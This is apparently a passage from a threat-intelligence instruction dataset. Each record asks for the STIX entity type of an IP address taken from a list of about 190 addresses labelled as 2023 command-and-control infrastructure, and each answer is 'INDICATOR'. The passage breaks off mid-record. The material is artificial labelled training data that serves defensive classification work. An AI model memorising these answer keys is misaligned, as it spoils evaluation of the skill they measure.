"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n5.199.161.29\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n137.184.178.46\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n134.122.43.175\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n64.226.84.229\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n161.35.232.118\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with 